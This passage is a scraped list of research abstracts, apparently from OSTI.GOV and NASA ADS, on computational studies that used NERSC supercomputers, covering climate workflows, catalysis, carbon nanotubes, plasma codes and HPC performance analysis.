crosscutting findings, and it identifies opportunities for productive collaborations among the DOE SC program offices.« less

  16. Enabling Efficient Climate Science Workflows in High Performance Computing Environments

    NASA Astrophysics Data System (ADS)

    Krishnan, H.; Byna, S.; Wehner, M. F.; Gu, J.; O'Brien, T. A.; Loring, B.; Stone, D. A.; Collins, W.; Prabhat, M.; Liu, Y.; Johnson, J. N.; Paciorek, C. J.

    2015-12-01

    A typical climate science workflow often involves a combination of acquisition of data, modeling, simulation, analysis, visualization, publishing, and storage of results. Each of these tasks provide a myriad of challenges when running on a high performance computing environment such as Hopper or Edison at NERSC. Hurdles such as data transfer and management, job scheduling, parallel analysis routines, and publication require a lot of forethought and planning to ensure that proper quality control mechanisms are in place. These steps require effectively utilizing a combination of well tested and newly developed functionality to move data, perform analysis, apply statistical routines, and finally, serve results and tools to the greater scientific community. As part of the CAlibrated and Systematic Characterization, Attribution and Detection of Extremes (CASCADE) project we highlight a stack of tools our team utilizes and has developed to ensure that large scale simulation and analysis work are commonplace and provide operations that assist in everything from generation/procurement of data (HTAR/Globus) to automating publication of results to portals like the Earth Systems Grid Federation (ESGF), all while executing everything in between in a scalable environment in a task parallel way (MPI). We highlight the use and benefit of these tools by showing several climate science analysis use cases they have been applied to.

  17. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Churchill, R. Michael

    Apache Spark is explored as a tool for analyzing large data sets from the magnetic fusion simulation code XGCI. Implementation details of Apache Spark on the NERSC Edison supercomputer are discussed, including binary file reading, and parameter setup. Here, an unsupervised machine learning algorithm, k-means clustering, is applied to XGCI particle distribution function data, showing that highly turbulent spatial regions do not have common coherent structures, but rather broad, ring-like structures in velocity space.

  18. Mechanisms of selective cleavage of C–O bonds in di-aryl ethers in aqueous phase

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    He, Jiayue; Zhao, Chen; Mei, Donghai

    2014-01-01

    A novel route for cleaving the C-O aryl ether bonds of p-substituted H-, CH 3-, and OH- diphenyl ethers has been explored over Ni/SiO 2 catalysts at very mild conditions. The C-O bond of diphenyl ether is cleaved by parallel hydrogenolysis and hydrolysis (hydrogenolysis combined with HO* addition) on Ni. The rates as a function of H 2 pressure from 0 to 10 MPa indicate that the rate-determining step is the C-O bond cleavage on Ni. H* atoms compete with the organic reactant for adsorption leading to a maximum in the rate with increasing H 2 pressure. In contrast tomore » diphenyl ether, hydrogenolysis is the exclusive route for cleaving an ether C-O bond of di-p-tolyl ether to form p-cresol and toluene. 4,4'-dihydroxydiphenyl ether undergoes sequential surface hydrogenolysis, first to phenol and HOC 6H 4O* (adsorbed), which is then cleaved to phenol (C 6H 5O* with added H*) and H 2O (O* with two added H*) in a second step. Density function theory supports the operation of this pathway. Notably, addition of H* to HOC 6H 4O* is less favorable than a further hydrogenolytic C-O bond cleavage. The TOFs of three aryl ethers with Ni/SiO 2 in water followed the order 4,4'-dihydroxydiphenyl ether (69 h -1) > diphenyl ether (26 h -1) > di-p-tolyl ether (1.3 h -1), in line with the increasing apparent activation energies, ranging from 93 kJ∙mol -1 (4,4'-dihydroxydiphenyl ether) < diphenyl ether (98 kJ∙mol -1) to di-p-tolyl ether (105 kJ∙mol -1). D.M. thanks the support from the US Department of Energy, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC). EMSL is a national scientific user facility located at Pacific Northwest National Laboratory (PNNL) and sponsored by DOE’s Office of Biological and Environmental Research.« less

  19. First-principles Study of Phenol Hydrogenation on Pt and Ni Catalysts in Aqueous Phase

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Yoon, Yeohoon; Rousseau, Roger J.; Weber, Robert S.

    2014-07-23

    The effects of aqueous phase on the reactivity of phenol hydrogenation over Pt and Ni catalysts were investigated using density functional theory based ab initio molecular dynamics (AIMD) calculations. The adsorption of phenol and the first hydrogenation steps via three carbon positions (ortho, meta and para) with respect to the phenolic OH group were studied in both vacuum and liquid phase conditions. To gain insight into how the aqueous phase affects the metal catalyst surface, increasing water environments including singly adsorbed water molecule, mono- (9 water molecules), double layers (24 water molecules), and the bulk liquid water which (52 watermore » molecules) on the Pt(111) and the Ni(111) surfaces were modeled. Compared to the vacuum/metal interfaces, AIMD simulation results suggest that the aqueous Pt(111) and Ni(111) interfaces have a lower metal work function in the order of 0.8 - 0.9 eV, thus, making the metals in aqueous phase stronger reducing agents and poorer oxidizing agents. Phenol adsorption from the aqueous phase is found to be slightly weaker that from the vapor phase. The first hydrogenation step of phenol at the ortho position of the phenolic ring is slightly favored over the other two positions. The polarization induced by the surrounding water molecules and the solvation effect play important roles in stabilizing the transition states associated with phenol hydrogenation by lowering the barriers of 0.1 - 0.4 eV. The detailed discussion on the basis of the interfacial electrostatics from the current study is very useful to understand the nature of a broader class of metal catalyzed reactions in liquid solution phase. This work was supported by the US Department of Energy (DOE), Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences and Office of Energy Efficiency and Renewable Energy. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC). EMSL is a national scientific user facility located at Pacific Northwest National Laboratory (PNNL) and sponsored by DOE’s Office of Biological and Environmental Research.« less

  20. Hydraulic Jumps, Waves and Other Flow Features Found by Modeling Stably-Stratified Flows in the Salt Lake Valley

    NASA Astrophysics Data System (ADS)

    Chen, Y.; Ludwig, F.; Street, R.

    2003-12-01

    The Advanced Regional Prediction System (ARPS) was used to simulate weak synoptic wind conditions with stable stratification and pronounced drainage flow at night in the vicinity of the Jordan Narrows at the south end of Salt Lake Valley. The simulations showed the flow to be quite complex with hydraulic jumps and internal waves that make it essential to use a complete treatment of the fluid dynamics. Six one-way nested grids were used to resolve the topography; they ranged from 20-km grid spacing, initialized by ETA 40-km operational analyses down to 250-m horizontal resolution and 200 vertically stretched levels to a height of 20 km, beginning with a 10-m cell at the surface. Most of the features of interest resulted from interactions with local terrain features, so that little was lost by using one-way nesting. Canyon, gap, and over-terrain flows have a large effect on mixing and vertical transport, especially in the regions where hydraulic jumps are likely. Our results also showed that the effect of spatial resolution on simulation performance is profound. The horizontal resolution must be such that the smallest features that are likely to have important impact on the flow are spanned by at least a few grid points. Thus, the 250 m minimum resolution of this study is appropriate for treating the effects of features of about 1 km or greater extent. To be consistent, the vertical cell dimension must resolve the same terrain features resolved by the horizontal grid. These simulations show that many of the interesting flow features produce observable wind and temperature gradients at or near the surface. Accordingly, some relatively simple field measurements might be made to confirm that the mixing phenomena that were simulated actually take place in the real atmosphere, which would be very valuable for planning large, expensive field campaigns. The work was supported by the Atmospheric Sciences Program, Office of Biological and Environmental Research, U.S. Department of Energy. The National Energy Research Scientific Computing Center (NERSC) provided computational time. We thank Professor Ming Xue and others at the University of Oklahoma for their help.

  1. Investigating the significance of zero-point motion in small molecular clusters of sulphuric acid and water

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Stinson, Jake L.; Kathmann, Shawn M.; Ford, Ian J.

    2014-01-14

    The nucleation of particles from trace gases in the atmosphere is an important source of cloud condensation nuclei (CCN), and these are vital for the formation of clouds in view of the high supersaturations required for homogeneous water droplet nucleation. The methods of quantum chemistry have increasingly been employed to model nucleation due to their high accuracy and efficiency in calculating configurational energies; and nucleation rates can be obtained from the associated free energies of particle formation. However, even in such advanced approaches, it is typically assumed that the nuclei have a classical nature, which is questionable for some systems.more » The importance of zero-point motion (also known as quantum nuclear dynamics) in modelling small clusters of sulphuric acid and water is tested here using the path integral molecular dynamics (PIMD) method at the density functional theory (DFT) level of theory. We observe a small zero-point effect on the the equilibrium structures of certain clusters. One configuration is found to display a bimodal behaviour at 300 K in contrast to the stable ionised state suggested from a zero temperature classical geometry optimisation. The general effect of zero-point motion is to promote the extent of proton transfer with respect to classical behaviour. We thank Prof. Angelos Michaelides and his group in University College London (UCL) for practical advice and helpful discussions. This work benefited from interactions with the Thomas Young Centre through seminar and discussions involving the PIMD method. SMK was supported by the U.S. Department of Energy, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences, and Biosciences. JLS and IJF were supported by the IMPACT scheme at UCL and by the U.S. Department of Energy, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences, and Biosciences. We are grateful for use of the UCL Legion High Performance Computing Facility and the resources of the National Energy Research Scientific Computing Center (NERSC), which is supported by the U.S. Department of Energy, Office of Science of the under Contract No. DE-AC02-05CH11231.« less

  2. Soft Functionals for Hard Matter

    NASA Astrophysics Data System (ADS)

    Cooper, Valentino R.; Yuk, Simuck F.; Krogel, Jaron T.

    Theory and computation are critical to the materials discovery process. While density functional theory (DFT) has become the standard for predicting materials properties, it is often plagued by inaccuracies in the underlying exchange-correlation functionals. Using high-throughput DFT calculations we explore the accuracy of various exchange-correlation functionals for modeling the structural and thermodynamic properties of a wide range of complex oxides. In particular, we examine the feasibility of using the nonlocal van der Waals density correlation functional with C09 exchange (C09x), which was designed for sparsely packed soft matter, for investigating the properties of hard matter like bulk oxides. Preliminary results show unprecedented performance for some prototypical bulk ferroelectrics, which can be correlated with similarities between C09x and PBEsol. This effort lays the groundwork for understanding how these soft functionals can be employed as general purpose functionals for studying a wide range of materials where strong internal bonds and nonlocal interactions coexist. Research was sponsored by the US DOE, Office of Science, BES, MSED and Early Career Research Programs and used resources at NERSC.

  3. First-Principles Equation of State and Shock Compression of Warm Dense Aluminum and Hydrocarbons

    NASA Astrophysics Data System (ADS)

    Driver, Kevin; Soubiran, Francois; Zhang, Shuai; Militzer, Burkhard

    2017-10-01

    Theoretical studies of warm dense plasmas are a key component of progress in fusion science, defense science, and astrophysics programs. Path integral Monte Carlo (PIMC) and density functional theory molecular dynamics (DFT-MD), two state-of-the-art, first-principles, electronic-structure simulation methods, provide a consistent description of plasmas over a wide range of density and temperature conditions. Here, we combine high-temperature PIMC data with lower-temperature DFT-MD data to compute coherent equations of state (EOS) for aluminum and hydrocarbon plasmas. Subsequently, we derive shock Hugoniot curves from these EOSs and extract the temperature-density evolution of plasma structure and ionization behavior from pair-correlation function analyses. Since PIMC and DFT-MD accurately treat effects of atomic shell structure, we find compression maxima along Hugoniot curves attributed to K-shell and L-shell ionization, which provide a benchmark for widely-used EOS tables, such as SESAME and LEOS, and more efficient models. LLNL-ABS-734424. Funding provided by the DOE (DE-SC0010517) and in part under the auspices of the U.S. Department of Energy by Lawrence Livermore National Laboratory under Contract DE-AC52-07NA27344. Computational resources provided by Blue Waters (NSF ACI1640776) and NERSC. K. Driver's and S. Zhang's current address is Lawrence Livermore Natl. Lab, Livermore, CA, 94550, USA.

  4. Final Report for DOE Grant DE-FG02-03ER25579; Development of High-Order Accurate Interface Tracking Algorithms and Improved Constitutive Models for Problems in Continuum Mechanics with Applications to Jetting

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Puckett, Elbridge Gerry; Miller, Gregory Hale

    Much of the work conducted under the auspices of DE-FG02-03ER25579 was characterized by an exceptionally close collaboration with researchers at the Lawrence Berkeley National Laboratory (LBNL). For example, Andy Nonaka, one of Professor Miller's graduate students in the Department of Applied Science at U. C. Davis (UCD) wrote his PhD thesis in an area of interest to researchers in the Applied Numerical Algorithms Group (ANAG), which is a part of the National Energy Research Supercomputer Center (NERSC) at LBNL. Dr. Nonaka collaborated closely with these researchers and subsequently published the results of this collaboration jointly with them, one article inmore » a peer reviewed journal article and one paper in the proceedings of a conference. Dr. Nonaka is now a research scientist in the Center for Computational Sciences and Engineering (CCSE), which is also part of the National Energy Research Supercomputer Center (NERSC) at LBNL. This collaboration with researchers at LBNL also included having one of Professor Puckett's graduate students in the Graduate Group in Applied Mathematics (GGAM) at UCD, Sarah Williams, spend the summer working with Dr. Ann Almgren, who is a staff scientist in CCSE. As a result of this visit Sarah decided work on a problem suggested by the head of CCSE, Dr. John Bell, for her PhD thesis. Having finished all of the coursework and examinations required for a PhD, Sarah stayed at LBNL to work on her thesis under the guidance of Dr. Bell. Sarah finished her PhD thesis in June of 2007. Writing a PhD thesis while working at one of the University of California (UC) managed DOE laboratories is long established tradition at UC and Professor Puckett has always encouraged his students to consider doing this. Another one of Professor Puckett's graduate students in the GGAM at UCD, Christopher Algieri, was partially supported with funds from DE-FG02-03ER25579 while he wrote his MS thesis in which he analyzed and extended work originally published by Dr. Phillip Colella, the head of ANAG, and some of his colleagues. Chris Algieri is now employed as a staff member in Dr. Bill Collins' Climate Science Department in the Earth Sciences Division at LBNL working with computational models of climate change. Finally, it should be noted that the work conducted by Professor Puckett and his students Sarah Williams and Chris Algieri and described in this final report for DOE grant # DE-FC02-03ER25579 is closely related to work performed by Professor Puckett and his students under the auspices of Professor Puckett's DOE SciDAC grant DE-FC02-01ER25473 An Algorithmic and Software Framework for Applied Partial Differential Equations: A DOE SciDAC Integrated Software Infrastructure Center (ISIC). Dr. Colella was the lead PI for this SciDAC grant, which was comprised of several research groups from DOE national laboratories and five university PI's from five different universities. In theory Professor Puckett tried to use funds from the SciDAC grant to support work directly involved in implementing algorithms developed by members of his research group at UCD as software that might be of use to Puckett's SciDAC CoPIs. (For example, see the work reported in Section 2.2.2 of this final report.) However, since there is considerable lead time spent developing such algorithms before they are ready to become `software' and research plans and goals change as the research progresses, Professor Puckett supported each member of his research group partially with funds from the SciDAC APDEC ISIC DE-FC02-01ER25473 and partially with funds from this DOE MICS grant DE-FC02-03ER25579. This has necessarily resulted in a significant overlap of project areas that were funded by both grants. In particular, both Sarah Williams and Chris Algieri were supported partially with funds from grant # DE-FG02-03ER25579, for which this is the final report, and in part with funds from Professor Puckett's DOE SciDAC grant # DE-FC02-01ER25473. For example, Sarah Williams received support from DE-FC02- 01ER25473 and DE-FC02-03ER25579, both while at UCD taking classes and writing her MS thesis and during the first year she was living in Berkeley and working at LBNL on her PhD thesis. In Chris Algieri's case he was at UCD during the entire time he received support from both grants. More specific details of their work are included in the report.« less

  5. Bellerophon

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Lingerfelt, Eric J; Messer, II, Otis E

    2017-01-02

    The Bellerophon software system supports CHIMERA, a production-level HPC application that simulates the evolution of core-collapse supernovae. Bellerophon enables CHIMERA's geographically dispersed team of collaborators to perform job monitoring and real-time data analysis from multiple supercomputing resources, including platforms at OLCF, NERSC, and NICS. Its multi-tier architecture provides an encapsulated, end-to-end software solution that enables the CHIMERA team to quickly and easily access highly customizable animated and static views of results from anywhere in the world via a cross-platform desktop application.

  6. Many-electron effects in the optical properties of single-walled carbon nanotubes

    NASA Astrophysics Data System (ADS)

    Spataru, Catalin D.; Ismail-Beigi, Sohrab; Capaz, Rodrigo B.; Louie, Steven G.

    2005-03-01

    Recent optical measurements on single-wall carbon nanotubes (SWCNT) showed anomalous behaviors that are indicative of strong many-electron effects. To understand these data, we performed ab initio calculation of self-energy and electron-hole interaction (excitonic) effects on the optical spectra of several SWCNTs. We employed a many-electron Green's function approach that determines both the quasiparticle and optical excitations from first principles. We found important many-electron effects that explain many of the puzzling experimental findings in the optical spectrum of these quasi-one dimensional systems, and are in excellent quantitative agreement with measurements. We have also calculated the radiative lifetime of the bright excitons in these tubes. Taking into account temperature effects and the existence of dark excitons, our results explain the radiative lifetime of excited nanotubes measured in time- resolved fluorescence experiments. This work was supported by the NSF under Grant No. DMR04-39768, and the U.S. DOE under Contract No. DE-AC03-76SF00098. Computational resources have been provided by NERSC and NPACI. RBC acknowledges financial support from the Guggenheim Foundation and Brazilian funding agencies CNPq, CAPES, FAPERJ, Instituto de Nanociências, FUJB-UFRJ and PRONEX-MCT.

  7. PATHA: Performance Analysis Tool for HPC Applications

    DOE PAGES

    Yoo, Wucherl; Koo, Michelle; Cao, Yi; ...

    2016-02-18

    Large science projects rely on complex workflows to analyze terabytes or petabytes of data. These jobs are often running over thousands of CPU cores and simultaneously performing data accesses, data movements, and computation. It is difficult to identify bottlenecks or to debug the performance issues in these large workflows. In order to address these challenges, we have developed Performance Analysis Tool for HPC Applications (PATHA) using the state-of-art open source big data processing tools. Our framework can ingest system logs to extract key performance measures, and apply the most sophisticated statistical tools and data mining methods on the performance data.more » Furthermore, it utilizes an efficient data processing engine to allow users to interactively analyze a large amount of different types of logs and measurements. To illustrate the functionality of PATHA, we conduct a case study on the workflows from an astronomy project known as the Palomar Transient Factory (PTF). This study processed 1.6 TB of system logs collected on the NERSC supercomputer Edison. Using PATHA, we were able to identify performance bottlenecks, which reside in three tasks of PTF workflow with the dependency on the density of celestial objects.« less

  8. Substrate Screening Effects in ab initio Many-body Green's Function Calculations of Doped Graphene on SiC

    NASA Astrophysics Data System (ADS)

    Vigil-Fowler, Derek; Lischner, Johannes; Louie, Steven

    2013-03-01

    Understanding many-electron interaction effects and the influence of the substrate in graphene-on-substrate systems is of great theoretical and practical interest. Thus far, both model Hamiltonian and ab initio GW calculations for the quasiparticle properties of such systems have employed crude models for the effect of the substrate, often approximating the complicated substrate dielectric matrix by a single constant. We develop a method in which the spatially-dependent dielectric matrix of the substrate (e.g., SiC) is incorporated into that of doped graphene to obtain an accurate total dielectric matrix. We present ab initio GW + cumulant expansion calculations, showing that both the cumulant expansion (to include higher-order electron correlations) and a proper account of the substrate screening are needed to achieve agreement with features seen in ARPES. We discuss how this methodology could be used in other systems. This work was supported by NSF Grant No. DMR10-1006184 and U.S. DOE Contract No. DE-AC02-05CH11231. Computational resources have been provided by the NERSC and NICS. D.V-F. acknowledges funding from the DOD's NDSEG fellowship.

  9. Interplay between Self-Assembled Structures and Energy Level Alignment of Benzenediamine on Au(111) Surfaces

    NASA Astrophysics Data System (ADS)

    Li, Guo; Neaton, Jeffrey

    2015-03-01

    Using van der Waals-corrected density functional theory (DFT) calculations, we study the adsorption of benzene-diamine (BDA) molecules on Au(111) surfaces. We find that at low surface coverage, the adsorbed molecules prefer to stay isolated from each other in a monomer phase, due to the inter-molecular dipole-dipole repulsions. However, when the coverage rises above a critical value of 0.9nm-2, the adsorbed molecules aggregate into linear structures via hydrogen bonding between amine groups, consistent with recent experiments [Haxton, Zhou, Tamblyn, et al, Phys. Rev. Lett. 111, 265701 (2013)]. Moreover, we find that these linear structures at high density considerably reduces the Au work function (relative to a monomer phase). Due to reduced surface polarization effects, we estimate that the resonance energy of the highest occupied molecular orbital of the adsorbed BDA molecule relative to the Au Fermi level is significantly lower than the monomer phase by more than 0.5 eV, consistent with the experimental measurements [DellAngela, Kladnik, and Cossaro, et al., Nano Lett. 10, 2470 (2010)]. This work supported by DOE (the JCAP under Award Number DE-SC000499 and the Molecular Foundry of LBNL), and computational resources provided by NERSC.

  10. Scaling Optimization of the SIESTA MHD Code

    NASA Astrophysics Data System (ADS)

    Seal, Sudip; Hirshman, Steven; Perumalla, Kalyan

    2013-10-01

    SIESTA is a parallel three-dimensional plasma equilibrium code capable of resolving magnetic islands at high spatial resolutions for toroidal plasmas. Originally designed to exploit small-scale parallelism, SIESTA has now been scaled to execute efficiently over several thousands of processors P. This scaling improvement was accomplished with minimal intrusion to the execution flow of the original version. First, the efficiency of the iterative solutions was improved by integrating the parallel tridiagonal block solver code BCYCLIC. Krylov-space generation in GMRES was then accelerated using a customized parallel matrix-vector multiplication algorithm. Novel parallel Hessian generation algorithms were integrated and memory access latencies were dramatically reduced through loop nest optimizations and data layout rearrangement. These optimizations sped up equilibria calculations by factors of 30-50. It is possible to compute solutions with granularity N/P near unity on extremely fine radial meshes (N > 1024 points). Grid separation in SIESTA, which manifests itself primarily in the resonant components of the pressure far from rational surfaces, is strongly suppressed by finer meshes. Large problem sizes of up to 300 K simultaneous non-linear coupled equations have been solved on the NERSC supercomputers. Work supported by U.S. DOE under Contract DE-AC05-00OR22725 with UT-Battelle, LLC.

  11. Graphics Processing Unit Acceleration of Gyrokinetic Turbulence Simulations

    NASA Astrophysics Data System (ADS)

    Hause, Benjamin; Parker, Scott; Chen, Yang

    2013-10-01

    We find a substantial increase in on-node performance using Graphics Processing Unit (GPU) acceleration in gyrokinetic delta-f particle-in-cell simulation. Optimization is performed on a two-dimensional slab gyrokinetic particle simulation using the Portland Group Fortran compiler with the OpenACC compiler directives and Fortran CUDA. Mixed implementation of both Open-ACC and CUDA is demonstrated. CUDA is required for optimizing the particle deposition algorithm. We have implemented the GPU acceleration on a third generation Core I7 gaming PC with two NVIDIA GTX 680 GPUs. We find comparable, or better, acceleration relative to the NERSC DIRAC cluster with the NVIDIA Tesla C2050 computing processor. The Tesla C 2050 is about 2.6 times more expensive than the GTX 580 gaming GPU. We also see enormous speedups (10 or more) on the Titan supercomputer at Oak Ridge with Kepler K20 GPUs. Results show speed-ups comparable or better than that of OpenMP models utilizing multiple cores. The use of hybrid OpenACC, CUDA Fortran, and MPI models across many nodes will also be discussed. Optimization strategies will be presented. We will discuss progress on optimizing the comprehensive three dimensional general geometry GEM code.

  12. Structure, dynamics and stability of water/scCO 2/mineral interfaces from ab initio molecular dynamics simulations

    DOE PAGES

    Lee, Mal -Soon; Peter McGrail, B.; Rousseau, Roger; ...

    2015-10-12

    Here, the interface between a solid and a complex multi-component liquid forms a unique reaction environment whose structure and composition can significantly deviate from either bulk or liquid phase and is poorly understood due the innate difficulty to obtain molecular level information. Feldspar minerals, as typified by the Ca-end member Anorthite, serve as prototypical model systems to assess the reactivity and ion mobility at solid/water-bearing supercritical fluid (WBSF) interfaces due to recent X-ray based measurements that provide information on water-film formation, and cation vacancies at these surfaces. Using density functional theory based molecular dynamics, which allows the evaluation of reactivitymore » and condensed phase dynamics on equal footing, we report on the structure and dynamics of water nucleation and surface aggregation, carbonation and Ca mobilization under geologic carbon sequestration scenarios (T = 323 K and P = 90 bar). We find that water has a strong enthalpic preference for aggregation on a Ca-rich, O-terminated anorthite (001) surface, but entropy strongly hinders the film formation at very low water concentrations. Carbonation reactions readily occur at electron-rich terminal Oxygen sites adjacent to cation vacancies, when in contact with supercritical CO 2. Cation vacancies of this type can form readily in the presence of a water layer that allows for facile and enthalpicly favorable Ca 2+ extraction and solvation. Apart from providing unprecedented molecular level detail of a complex three component (mineral, water and scCO 2) system), this work highlights the ability of modern capabilities of AIMD methods to begin to qualitatively and quantitatively address structure and reactivity at solid-liquid interfaces of high chemical complexity. This work was supported by the US Department of Energy, Office of Fossil Energy (M.-S. L., B. P. M. and V.-A. G.) and the Office of Basic Energy Science, Division of Chemical Sciences, Geosciences and Biosciences (R.R.), and performed at the Pacific Northwest National Laboratory (PNNL). PNNL is a multi-program national laboratory operated for DOE by Battelle. Computational resources were provided by PNNL’s Platform for Institutional Computing (PIC), the W. R. Wiley Environmental Molecular Science Laboratory (EMSL), a national scientific user facility sponsored by the Department of Energy’s Office of Biological and Environmental Research located at PNNL and the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory.« less

  13. Performance Analysis Tool for HPC and Big Data Applications on Scientific Clusters

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Yoo, Wucherl; Koo, Michelle; Cao, Yu

    Big data is prevalent in HPC computing. Many HPC projects rely on complex workflows to analyze terabytes or petabytes of data. These workflows often require running over thousands of CPU cores and performing simultaneous data accesses, data movements, and computation. It is challenging to analyze the performance involving terabytes or petabytes of workflow data or measurement data of the executions, from complex workflows over a large number of nodes and multiple parallel task executions. To help identify performance bottlenecks or debug the performance issues in large-scale scientific applications and scientific clusters, we have developed a performance analysis framework, using state-ofthe-more » art open-source big data processing tools. Our tool can ingest system logs and application performance measurements to extract key performance features, and apply the most sophisticated statistical tools and data mining methods on the performance data. It utilizes an efficient data processing engine to allow users to interactively analyze a large amount of different types of logs and measurements. To illustrate the functionality of the big data analysis framework, we conduct case studies on the workflows from an astronomy project known as the Palomar Transient Factory (PTF) and the job logs from the genome analysis scientific cluster. Our study processed many terabytes of system logs and application performance measurements collected on the HPC systems at NERSC. The implementation of our tool is generic enough to be used for analyzing the performance of other HPC systems and Big Data workows.« less

  14. Highly Active and Stable MgAl2O4 Supported Rh and Ir Catalysts for Methane Steam Reforming: A Combined Experimental and Theoretical Study

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Mei, Donghai; Glezakou, Vassiliki Alexandra; Lebarbier, Vanessa MC

    2014-07-01

    In this work we present a combined experimental and theoretical investigation of stable MgAl2O4 spinel-supported Rh and Ir catalysts for the steam methane reforming (SMR) reaction. Firstly, catalytic performance for a series of noble metal catalysts supported on MgAl2O4 spinel was evaluated for SMR at 600-850°C. Turnover rate at 850°C follows the order: Pd > Pt > Ir > Rh > Ru > Ni. However, Rh and Ir were found to have the best combination of activity and stability for methane steam reforming in the presence of simulated biomass-derived syngas. It was found that highly dispersed ~2 nm Rh andmore » ~1 nm Ir clusters were formed on the MgAl2O4 spinel support. Scanning Transition Electron Microscopy (STEM) images show that excellent dispersion was maintained even under challenging high temperature conditions (e.g. at 850°C in the presence of steam) while Ir and Rh catalysts supported on Al2O3 were observed to sinter at increased rates under the same conditions. These observations were further confirmed by ab initio molecular dynamics (AIMD) simulations which find that ~1 nm Rh and Ir particles (50-atom cluster) bind strongly to the MgAl2O4 surfaces via a redox process leading to a strong metal-support interaction, thus helping anchor the metal clusters and reduce the tendency to sinter. Density functional theory (DFT) calculations suggest that these supported smaller Rh and Ir particles have a lower work function than larger more bulk-like ones, which enables them to activate both water and methane more effectively than larger particles, yet have a minimal influence on the relative stability of coke precursors. In addition, theoretical mechanistic studies were used to probe the relationship between structure and reactivity. Consistent with the experimental observations, our theoretical modeling results also suggest that the small spinel-supported Ir particle catalyst is more active than the counterpart of Rh catalyst for SMR. This work was financially supported by the United States Department of Energy (DOE)’s Bioenergy Technologies Office (BETO) and performed at the Pacific Northwest National Laboratory (PNNL). PNNL is a multi-program national laboratory operated for DOE by Battelle Memorial Institute. Computing time was granted by a user proposal at the Molecular Science Computing Facility in the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) located at PNNL. Part of the computational time was provided by the National Energy Research Scientific Computing Center (NERSC).« less

  15. Are Cloud Environments Ready for Scientific Applications?

    NASA Astrophysics Data System (ADS)

    Mehrotra, P.; Shackleford, K.

    2011-12-01

    Cloud computing environments are becoming widely available both in the commercial and government sectors. They provide flexibility to rapidly provision resources in order to meet dynamic and changing computational needs without the customers incurring capital expenses and/or requiring technical expertise. Clouds also provide reliable access to resources even though the end-user may not have in-house expertise for acquiring or operating such resources. Consolidation and pooling in a cloud environment allow organizations to achieve economies of scale in provisioning or procuring computing resources and services. Because of these and other benefits, many businesses and organizations are migrating their business applications (e.g., websites, social media, and business processes) to cloud environments-evidenced by the commercial success of offerings such as the Amazon EC2. In this paper, we focus on the feasibility of utilizing cloud environments for scientific workloads and workflows particularly of interest to NASA scientists and engineers. There is a wide spectrum of such technical computations. These applications range from small workstation-level computations to mid-range computing requiring small clusters to high-performance simulations requiring supercomputing systems with high bandwidth/low latency interconnects. Data-centric applications manage and manipulate large data sets such as satellite observational data and/or data previously produced by high-fidelity modeling and simulation computations. Most of the applications are run in batch mode with static resource requirements. However, there do exist situations that have dynamic demands, particularly ones with public-facing interfaces providing information to the general public, collaborators and partners, as well as to internal NASA users. In the last few months we have been studying the suitability of cloud environments for NASA's technical and scientific workloads. We have ported several applications to multiple cloud environments including NASA's Nebula environment, Amazon's EC2, Magellan at NERSC, and SGI's Cyclone system. We critically examined the performance of the applications on these systems. We also collected information on the usability of these cloud environments. In this talk we will present the results of our study focusing on the efficacy of using clouds for NASA's scientific applications.

  16. Anharmonicity and confinement in zeolites: Structure, spectroscopy, and adsorption free energy of ethanol in H-ZSM-5

    DOE PAGES

    Alexopoulos, Konstantinos; Lee, Mal -Soon; Liu, Yue; ...

    2016-03-21

    Here, to account for thermal and entropic effects caused by the dynamics of the motion of the reaction intermediates, ethanol adsorption on the Brønsted acid site of the H-ZSM-5 catalyst has been studied at different temperatures and ethanol loadings using ab initio molecular dynamics (AIMD) simulations, infrared (IR) spectroscopy and calorimetric measurements. At low temperatures (T ≤ 400 K) and ethanol loading, a single ethanol molecule adsorbed in H-ZSM-5 forms a Zundel-like structure where the proton is equally shared between the oxygen of the zeolite and the oxygen of the alcohol. At higher ethanol loading, a second ethanol molecule helpsmore » to stabilize the protonated ethanol at all temperatures by acting as a solvating agent. The vibrational density of states (VDOS), as calculated from the AIMD simulations, are in excellent agreement with measured IR spectra for C 2H 5OH, C 2H 5OD and C 2D 5OH isotopomers and support the existence of both monomers and dimers. A quasi-harmonic approximation (QHA), applied to the VDOS obtained from the AIMD simulations, provides estimates of adsorption free energy within ~10 kJ/mol of the experimentally determined quantities, whereas the traditional approach, employing harmonic frequencies from a single ground state minimum, strongly overestimates the adsorption free energy by at least ~30 kJ/mol. This discrepancy is traced back to the inability of the harmonic approximation to represent the contributions to the vibrational motions of the ethanol molecule upon confinement in the zeolite. KA, MFR, GBM were supported by the Long Term Structural Methusalem Funding by the Flemish Government – grant number BOF09/01M00409. MSL, VAG, RR and JAL were supported by the US Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. PNNL is a multiprogram national laboratory operated for DOE by Battelle. Computational resources were provided at W. R. Wiley Environmental Molecular Science Laboratory (EMSL), a national scientific user facility sponsored by the Department of Energy’s Office of Biological and Environmental Research located at PNNL, the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory and the Stevin Supercomputer Infrastructure at Ghent University.« less

  17. Diffusion of lithium ions in amorphous and crystalline PEO3:LiCF3SO3 polymer electrolytes: ab initio calculations and simulations

    NASA Astrophysics Data System (ADS)

    Xue, Sha; Liu, Yingdi; Li, Yaping; Teeters, Dale; Crunkleton, Daniel; Wang, Sanwu

